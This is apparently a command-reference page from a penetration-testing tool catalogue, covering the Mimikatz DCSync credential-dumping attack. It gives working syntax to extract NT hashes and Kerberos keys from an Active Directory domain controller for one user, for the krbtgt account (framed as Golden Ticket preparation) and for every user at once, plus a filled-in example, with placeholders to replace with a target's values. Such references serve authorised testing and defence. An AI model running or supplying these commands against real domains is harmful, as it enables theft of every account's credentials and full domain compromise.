Mimikatz lsadump::dcsync

Pull a single user's NT hash and Kerberos keys directly from a DC via the MS-DRSR replication protocol. No code runs on the DC. Requires DCSync rights (DA, EA, or explicit Replicating Directory Changes / Replicating Directory Changes All).

Tool
mimikatz.exe
Category
Credential Attacks / Hash Dumping
Platform
windows
Requires
shell access
Protocols
KERBEROS, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

mimikatz.exe "lsadump::dcsync /domain:<domain> /user:<target-user>" exit

Credential variants

The same attack using a different authentication material.

krbtgt (Golden Ticket Prep) requires shell access

mimikatz.exe "lsadump::dcsync /domain:<domain> /user:krbtgt" exit

All Users requires shell access

mimikatz.exe "lsadump::dcsync /domain:<domain> /all /csv" exit

Examples

mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit

Tags

mimikatz dcsync drsuapi